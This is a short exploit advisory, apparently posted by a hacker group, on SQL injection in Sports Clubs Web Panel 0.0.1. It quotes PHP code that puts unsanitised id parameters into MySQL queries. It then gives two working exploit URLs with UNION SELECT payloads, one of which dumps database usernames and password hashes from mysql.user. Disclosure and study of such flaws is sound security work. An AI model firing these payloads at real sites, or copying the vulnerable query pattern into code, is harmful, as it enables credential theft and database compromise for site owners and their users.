################################################################################### # # # ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::.... # ################################################################################### Virangar Security Team www.virangar.net -------- Discoverd By :virangar security team(Zahra:zh_virangar) special tnx :my master hadihadi tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007 & all virangar members & all hackerz ------- vuln codes in /include/draw-view.php: line 22: if(isset($_GET['id']) || isset($_POST['id'])) { lin 23: $teamid = $_GET['id'].$_POST['id']; ... ... line 43: $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate"); ---------- vuln codes in /include/draw-edit.php line 1: $id = $_GET['id']; line 2: $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1"); -------- exploit: http://site.com/[patch]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/* http://site.com/[patch]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/* ------------- young iranian h4ck3rz